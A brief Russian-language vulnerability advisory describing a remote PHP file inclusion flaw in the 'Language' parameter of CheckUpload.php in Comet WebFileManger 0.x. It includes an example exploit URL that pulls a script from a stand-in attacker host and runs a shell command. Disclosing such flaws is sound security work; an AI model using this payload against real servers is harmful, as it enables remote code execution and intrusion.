Программа: Comet WebFileManger 0.x
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "Language" в сценарии CheckUpload.
Пример:
http://[target]/CheckUpload.php?Language=http://evilsite.com/dblib.php/&cmd=ls
